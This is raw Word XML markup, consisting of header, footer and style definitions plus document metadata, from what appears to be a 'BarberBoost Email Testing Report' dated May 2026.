        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>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74AB4" w14:textId="77777777" w:rsidR="00020772" w:rsidRDefault="000207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95218" w14:textId="77777777" w:rsidR="00591226" w:rsidRDefault="00591226" w:rsidP="00020772">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="04D15ED3" w14:textId="77777777" w:rsidR="00591226" w:rsidRDefault="00591226" w:rsidP="0002077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6A71" w14:textId="77777777" w:rsidR="00020772" w:rsidRDefault="000207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BC58F" w14:textId="7949DDEA" w:rsidR="00020772" w:rsidRPr="00020772" w:rsidRDefault="00020772" w:rsidP="00020772">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:proofErr w:type="gramStart"/>
    <w:r w:rsidRPr="00020772">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>BARBERBOOST  |</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r w:rsidRPr="00020772">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">  Email Testing </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r w:rsidRPr="00020772">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>Report  |</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r w:rsidRPr="00020772">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="787777"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">  7 May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DD95" w14:textId="77777777" w:rsidR="00020772" w:rsidRDefault="000207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F026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B7C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72338581">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="20815597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MjI1NTM0NzI1tzAyMTVS0lEKTi0uzszPAykwqgUAZOVveywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="004C5E58"/>
    <w:rsid w:val="00020772"/>
    <w:rsid w:val="000A45C8"/>
    <w:rsid w:val="00122C20"/>
    <w:rsid w:val="004C5E58"/>
    <w:rsid w:val="00591226"/>
    <w:rsid w:val="007A7CFB"/>
    <w:rsid w:val="00B45FC6"/>
    <w:rsid w:val="00CD0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C14C6"/>
  <w15:docId w15:val="{271FA5D8-AE59-40A1-B878-DFEF7DB76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20772"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00020772"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:rsid w:val="00020772"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:rsid w:val="00020772"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:rsid w:val="00020772"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:rsid w:val="000207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scripts/test-emails.mjs"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src/lib/email/templates.ts"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TotalTime>
  <Pages>1</Pages>
  <Words>3427</Words>
  <Characters>19535</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>162</Lines>
  <Paragraphs>45</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22917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 JATAU</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Dan JATAU</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2026-05-07T09:39:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-06T15:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-07T11:30:00Z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e4fed65a-d84b-43a6-85ac-c62ed7dca4ea</vt:lpwstr>
  </property>
</Properties>
</file>